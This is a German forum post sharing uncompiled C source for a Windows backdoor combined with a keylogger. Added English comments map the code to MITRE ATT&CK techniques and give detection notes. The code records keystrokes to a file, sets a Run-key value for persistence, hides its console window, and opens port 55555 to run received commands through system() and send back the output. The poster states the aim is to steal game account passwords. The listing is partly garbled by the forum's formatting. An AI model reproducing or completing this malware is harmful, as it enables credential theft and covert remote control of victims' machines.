


Multi threaded backdoor with remotekeylogger

Discussion on Multi threaded backdoor with remotekeylogger within the General Coding forum part of the Coders Den category.

Hallöchen hallöchen, ich bin momentan dabei, mir nen kleines backdoor mit nen kleinen remotekeylogger zu proggen, natürlich sollte das alles in einen prog laufen.
Kurze info damits übersichtlicher wird, der keylogger ist gethreaded, dat backdoor ist main func...

Mein problem: eigentl. möchte ich mit dem keylogger 100% cpu auslastung erreichen, das mache ich weil ich ihn in einer while schleife hängen lasse, und die ganze zeit den tastatur state abfrage (ohne eine sleep funktion). nur hab ich jetz das prob, dass ich es nicht schaffe, die cpu auslastung bleibt ganz normal. ich hab mal den backdoor code auch mit dazugepackt, damit habt ihr nen bessren überblick über die thread funktionen.
der code hat eventuell noch ein paar syntaxfehler, hab das prog noch nicht compiliert, aber ich kann jetz schon sagen das ich die 100% cpu auslastung nicht bekommen, kann mir wer sagen wie ich das hinbekommen, obwohl der logger in nen thread läuft ?
hier mal der code:

Code:
#include <windows.h> 
#include <process.h> 
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <time.h>
#include <conio.h> 
#define NUM_ELEMENTS(x) *(sizeof((x)) / sizeof((x)[0])) * * * * * * * * * * 


 
// State shared between main() and the worker thread started with
// _beginthreadex(): main() sets dwAbortThread to TRUE to request a stop,
// and both sides access the flag only while holding csCritical.
struct SThreadData 
{ 
 * DWORD * * * * * *dwAbortThread; 
 * CRITICAL_SECTION csCritical; 
}; 


// Worker-thread entry point: a polling keystroke logger (MITRE ATT&CK
// T1056.001, Input Capture: Keylogging).
//
// pvParam is the SThreadData* that main() passes to _beginthreadex().
// The body appends a timestamped banner to a log file on the C: drive,
// then polls GetAsyncKeyState() for every virtual-key code from 8 to 222
// and appends one character or a bracketed key name per detected press.
// Returns 1 when the log file cannot be opened inside the polling loop,
// otherwise 0 once the outer loop is left.
//
// NOTE(review): the poster states this listing was never compiled, and the
// forum rendering has replaced indentation with space-asterisk runs, so
// read it as an analysis sample rather than as working code.
//
// Detection notes: the visible behaviour is a process that calls
// GetAsyncKeyState() across the whole key range in a tight loop with no
// sleep, and that reopens, appends to and closes the same fixed-path file
// for every key event.
unsigned int __stdcall ThreadProc(void* pvParam) 
{ 
 * assert(pvParam); *
 * SThreadData* pData = static_cast<SThreadData*>(pvParam); 
 * DWORD dwCheck; 
 * while(true) 
 * { 
 *

int idex;
char *buffer;
long LogLength;
long len;


// Banner: open the log in append mode, write the current time and a fixed
// header block, then close it again.
FILE *log;
 * log=fopen("c:\log.txt","a+");

 * time_t theTime=time(0);
 * fputs("\nLogged keys by cLog at: ", log);
 * fputs(ctime(&theTime),log);

 * fputs("-------------------------------------------------\n",log);
 * fputs("~~~~~~~ © by CC_IP POWERED BY EXCLUDED.ORG ~~~~~~\n",log);
 * fputs("-------------------------------------------------\n",log);
 * fputs("\n",log);
 * fclose(log);






log=fopen("c:\log.txt","a+");


// Polling loop: every pass scans the key codes and compares the
// GetAsyncKeyState() result with -32767. The original author comment on
// the loop records that it deliberately contains no sleep call.
 * * * * * short character;
 * * * * * * while(1)
 * * * * * * { * * // yes not sleep here, --> 100% cpu !
 * * * * * * * * * *for(character=8;character<=222;character++)
 * * * * * * * * * *{
 * * * * * * * * * * * *if(GetAsyncKeyState(character)==-32767)
 * * * * * * * * * * * *{ *
 * * * * * * * * * * * * * *FILE *log;
 * * * * * * * * * * * * * *log=fopen("C:\log.txt","a+");
 * * * * * * * * * * * * * *if(log==NULL)
 * * * * * * * * * * * * * *{
 * * * * * * * * * * * * * * * * * *return 1;
 * * * * * * * * * * * * * *} * * * * * *
 * * * * * * * * * * * * * *if(log!=NULL)
 * * * * * * * * * * * * * *{ * * * *
// Codes 39..64 are written unchanged; codes 65..90 have 32 added before
// being written; every other code goes through the switch below, which
// writes a punctuation mark, a digit or a bracketed key name.
 * * * * * * * * * * * * * * * * * *if((character>=39)&&(character<=64))
 * * * * * * * * * * * * * * * * * *{
 * * * * * * * * * * * * * * * * * * * * *fputc(character,log);
 * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * *} * * * *
 * * * * * * * * * * * * * * * * * *else if((character>64)&&(character<91))
 * * * * * * * * * * * * * * * * * *{
 * * * * * * * * * * * * * * * * * * * * *character+=32;
 * * * * * * * * * * * * * * * * * * * * *fputc(character,log);
 * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * *}
 * * * * * * * * * * * * * * * * * *else
 * * * * * * * * * * * * * * * * * *{
 * * * * * * * * * * * * * * * * * * * *switch(character)
 * * * * * * * * * * * * * * * * * * * *{
 * * * * * * * * * * * * * * * * * * * * * * *case 187:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('+',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case 188:
 * * * * * * * * * * * * * * * * * * * * * * *fputc(',',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case 189:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('-',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case 190:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('.',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD0:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('0',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD1:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('1',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD2:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('2',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD3:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('3',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD4:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('4',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD5:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('5',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD6:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('6',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD7:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('7',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD8:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('8',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_NUMPAD9:
 * * * * * * * * * * * * * * * * * * * * * * *fputc('9',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_CAPITAL:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[CAPS LOCK]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_SHIFT:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[SHIFT]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *case VK_SPACE:
 * * * * * * * * * * * * * * * * * * * * * * *fputc(' ',log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break; * *
 * * * * * * * * * * * * * * * * * * * * * * *case VK_CONTROL:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[CTRL]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *break; * * * * * * * * * * * * * * * * * * * * * *
 * * * * * * * * * * * * * * * * * * * * * * *case VK_RETURN:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[RETURN]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_BACK:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[BACKSPACE]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_TAB:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[TAB]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *case VK_DELETE:
 * * * * * * * * * * * * * * * * * * * * * * *fputs("\r\n[DELETE]\r\n",log);
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * * * * *default:
 * * * * * * * * * * * * * * * * * * * * * * *fclose(log);
 * * * * * * * * * * * * * * * * * * * * * * *break;
 * * * * * * * * * * * * * * * * * * * } * * * *
 * * * * * * * * * * * * * * * * *} * *
 * * * * * * * * * * * * * * } * * * *
 * * * * * * * * * } * *
 * * * * * * * } * * * * * * * * *
// Log size check: measure the file with fseek/ftell; once its size reaches
// LogLength the contents are read into a heap buffer and the file is then
// reopened in write mode, which truncates it.
 * * * * * *FILE *log;
 * * * * * log=fopen("c:\log.txt","rb");
 * * * * * fseek(log,0,SEEK_END); * * * * * * * *
 * * * * * len=ftell(log); * * * * * * * * *
 * * * * * if(len>=LogLength)
 * * * * * *{
 * * * * * * fseek(log,0,SEEK_SET);
 * * * * * * buffer=(char *)malloc(len);
 * * * * * * idex=fread(buffer,1,len,log);//
 * * * * * * buffer[idex] = '<!--POST BOX-->'; * * * * * * *	
 * * * * * * fclose(log);
 * * * * * * log=fopen("c:\log.txt","w");
 * * * * * * }
 * * * * * 
 * * * * * *fclose(log);
 *}
 * * * * * *free (buffer);


// Stop request check: read the abort flag under the critical section and
// leave the outer loop when main() has set it.
 * * *EnterCriticalSection(&pData->csCritical); 
 * * *dwCheck = pData->dwAbortThread; 
 * * *LeaveCriticalSection(&pData->csCritical); 
 * * *if(dwCheck) 
 * * * *break; 
 * } 
 * return (0); 
} 

// Program entry point of the posted backdoor. In the order the listing
// shows them, it:
//   1. starts ThreadProc on a second thread (the keystroke logger);
//   2. sets the value Autostart = C:\Programme\n32s.exe under the
//      HKEY_LOCAL_MACHINE key Software\Microsoft\Windows\CurrentVersion\Run
//      (logon persistence, MITRE ATT&CK T1547.001);
//   3. resolves the local host name with gethostname/gethostbyname and
//      copies the first four bytes of each returned address into ucAddress;
//   4. hides the console window (ATT&CK T1564.003);
//   5. binds a TCP socket to port 55555, listens, accepts a connection and
//      passes each received buffer to system() with an output redirect
//      appended, then reads the redirect file and calls send()
//      (ATT&CK T1059.003).
// On the way out it sets the abort flag, waits for the thread, closes the
// handle and deletes the critical section. startWinsock(), whose definition
// appears textually inside this function in the posted listing, wraps
// WSAStartup(MAKEWORD(2,0)).
//
// Detection notes, using only values present in this listing: a Run-key
// value named Autostart that points at C:\Programme\n32s.exe, an inbound
// TCP listener on port 55555, a console process that hides its own window,
// and command-interpreter child processes created through system().
int main() 
{ 
 * SThreadData data; 
 * data.dwAbortThread = FALSE; 
 * InitializeCriticalSection(&data.csCritical); 
 *
 * HANDLE hThread = reinterpret_cast<HANDLE>(_beginthreadex(NULL, 0, ThreadProc, &data, 0, NULL)); 
 * while(!kbhit()) 
 *
int startWinsock(void);
 *	long rc;
 * * *SOCKET acceptSocket;
 * * *SOCKET connectedSocket;
 * * *SOCKADDR_IN addr;
 * * *char buf[256];
 * * *char buf2[300];

// Persistence: writes a REG_SZ value under the machine-wide Run key.
// Value-set events on this key (for example Sysmon event ID 13) are a
// standard place to alert on.
 *HKEY hkey;
 *HKEY KEY = HKEY_LOCAL_MACHINE;
 *char place[100]= {"Software\Microsoft\Windows\CurrentVersion\Run"};
 *char name[100]= {"Autostart"};
 *char value[100]= {"C:\Programme\n32s.exe"};

 *RegOpenKeyEx(KEY,(LPCTSTR)place,0, KEY_ALL_ACCESS,&hkey);
 *RegSetValueEx(hkey, name, 0, REG_SZ, (BYTE *)value, strlen(value));
 *RegCloseKey(hkey);


struct hostent* h;
 *WSADATA wsaData;
 *UCHAR * ucAddress[4];
 *CHAR * *szAddressInfo[64];
 *CHAR * *szHostName[MAX_PATH];

 * *WSAStartup(MAKEWORD(1, 1), &wsaData);
 * *if(SOCKET_ERROR != gethostname(szHostName, NUM_ELEMENTS(szHostName)))
 * *{
 * * * *if(NULL != (h = gethostbyname(szHostName)))
 * * * *{
 * * * * * *for(unsigned x = 0; (h->h_addr_list[x]); x++)
 * * * * * *{
 * * * * * * * *ucAddress[0] = h->h_addr_list[x][0];
 * * * * * * * *ucAddress[1] = h->h_addr_list[x][1];
 * * * * * * * *ucAddress[2] = h->h_addr_list[x][2];
 * * * * * * * *ucAddress[3] = h->h_addr_list[x][3];
 * * * * * *}
 * * * *}
 * *}
 * *WSACleanup();



 *rc = startWinsock();


// Looks up a window of class ConsoleWindowClass and hides it with SW_HIDE,
// so the printf() status messages below are not visible to the user.
 * *HWND hwnd = FindWindow("ConsoleWindowClass",NULL);
 * ShowWindow(hwnd,SW_HIDE);


 * * *printf("W32 Server © CC_IP 2006\n");
 * * *if(rc!=0)
 * * *	{
 * * * *printf("\code: %d\n",rc);
 * * *	return 1;
 * * *	}
 * * *	else
 * * *	{
 * * *	printf("\nWinsock startup ok!\n");
 * * *	}

 * * acceptSocket=socket(AF_INET,SOCK_STREAM,0);
 * * * * if(acceptSocket==INVALID_SOCKET)
 * * * * {
 * * * * printf("\code: %d\n",WSAGetLastError());
 * * * * return 1;
 * * * * }
 * * * * else
 * * * * {
 * * * * printf("\nSocket created!\n");
 * * * * }



// Listener setup: the port passed to htons() is 55555; the status message
// printed after bind() shows a different number.
 * memset(&addr,0,sizeof(SOCKADDR_IN));
 * addr.sin_family=AF_INET;
 * addr.sin_port=htons(55555);
 * addr.sin_addr.s_addr=inet_addr(szAddressInfo);

 * rc=bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));

 * if(rc==SOCKET_ERROR)
 * *{
 * * *printf("\ncode: %d\n",WSAGetLastError());
 * * *}
 * * *else
 * * *{
 * * *printf("\nSocket bound on port 555555\n");
 * * *}

 * * *rc=listen(acceptSocket,10);
 * * *if(rc==SOCKET_ERROR)
 * * *{
 * * *printf("\code: %d",WSAGetLastError());
 * * *}
 * * *else
 * * *{
 * * *printf("\listenmode\n");
 * * *}

 * * *connectedSocket=accept(acceptSocket,NULL,NULL);
 * * *if(connectedSocket==INVALID_SOCKET)
 * * *	{
 * * * * printf("code: %d\n", WSAGetLastError());
 * * * * }
 * * * * else
 * * * * {
 * * * * printf("New connection\n");
 * * * * }

// Command loop: bytes from recv() go straight to system() after a redirect
// suffix is appended. Nothing in the listing authenticates the peer or
// restricts the command, so any host that can reach the listening port gets
// command execution with the privileges of this process. The redirect file
// is then read into a heap buffer that is passed to send().
 *while(rc!=SOCKET_ERROR)
 *{
 * *rc=recv(connectedSocket,buf,256,0);
 * *if(rc==0)
 * *{
 * * *printf("connection lost\n");
 * * *break;
 * *}
 * *if(rc==SOCKET_ERROR)
 * *{
 * * *printf("code: %d\n",WSAGetLastError());
 * * *break;
 * *}

 * *buf[rc+9]='<!--POST BOX-->';

 * *buf[rc]='>';
 * *buf[rc+1]='c';
 * *buf[rc+2]=':';
 * *buf[rc+3]='\';
 * *buf[rc+4]='a';
 * *buf[rc+5]='.';
 * *buf[rc+6]='t';
 * *buf[rc+7]='x';
 * *buf[rc+8]='t';

 * *system(buf); 




 * *FILE * pFile;
 *long lSize;
 *char * buffer;

 *pFile = fopen ( "c:\a.txt" , "rb" );
 *if (pFile==NULL) exit (1);

 *fseek (pFile , 0 , SEEK_END);
 *lSize = ftell (pFile);
 *rewind (pFile);

 *buffer = (char*) malloc (lSize);
 *if (buffer == NULL) exit (2);

 *fread (buffer,1,lSize,pFile);


 *fclose (pFile);
 *free (buffer);
 * * * rc=send(connectedSocket,buffer,strlen(buffer),0);



 

 *closesocket(acceptSocket);
 *closesocket(connectedSocket);
 * * * * * }
 * * *int startWinsock(void)
 * * *	{
 * *WSADATA wsa;
 * *return WSAStartup(MAKEWORD(2,0),&wsa);
 * * *}



 
 * EnterCriticalSection(&data.csCritical); 
 * data.dwAbortThread = TRUE; 
 * LeaveCriticalSection(&data.csCritical); 

 * 
 * WaitForSingleObject(hThread, INFINITE); 
 * CloseHandle(hThread); 
 * DeleteCriticalSection(&data.csCritical); 
 * return (0); 
}
Ajo, bevor mir einer zuvor kommt, ich weiß es gibt bessere methoden nen keylogger zu basteln, aber ich will keinen globalen keyboardhook machen, und ja ich weiß das es eventuell sinnvoller ist, die keylogger daten per mail zu verschicken, möchte ich aber auch nicht, da ich mir noch nen kleinen client dazuproggen werden, der mir die daten schickt(und ja, ich weiß der code funkt nicht wenn man hinter NAT sitzt). Um das ganze mal irgendwie in die gameszene zu bringen, mit client möchte ich mir die daten vom keylogger saugen (manchmal is ja account und pw mit drin ).

edit: evtl versuch ichs mal zu compiliern wenn ich daheim bin, in der arbeit mögen es die it-leute immer ned so gerne, wenn man auf registrierten ports (1025-49152) dienste laufen lässt...